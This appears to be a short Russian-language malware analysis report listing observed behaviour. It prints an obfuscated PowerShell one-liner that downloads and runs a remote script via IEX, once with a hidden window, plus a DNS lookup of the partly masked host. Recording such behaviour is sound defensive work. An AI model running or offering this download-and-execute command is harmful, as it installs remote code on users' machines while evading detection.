Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('http://sk#######malwrhunterteams.com/scanme.txt')
- DNS ASK sk#######malwrhunterteams.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('http://sk#######malwrhunterteams.com/scanme.txt')' (со скрытым окном)